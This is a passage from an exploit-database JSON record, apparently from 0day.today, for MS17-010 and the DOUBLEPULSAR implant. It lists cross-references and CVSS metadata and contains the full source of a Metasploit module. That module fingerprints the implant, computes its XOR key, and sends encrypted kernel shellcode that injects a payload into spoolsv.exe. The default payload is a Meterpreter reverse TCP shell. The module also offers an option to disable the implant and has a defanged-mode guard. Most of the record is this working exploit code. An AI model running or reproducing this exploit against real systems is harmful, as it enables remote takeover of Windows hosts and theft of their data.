"CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96709", "SMNTC-96706", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-13T22:18:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-13T22:18:48", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => 
true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-14] #"}, "lastseen": "2021-09-13T22:18:48", "differentElements": ["sourceData"], "edition": 16}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "d0de1e6bbd3420c50ba71cf6cd360164", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-14T22:19:12", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", 
"EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "700099.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96704", "SMNTC-96705", "SMNTC-96703", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
"idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-14T22:19:12", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-14T22:19:12", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: 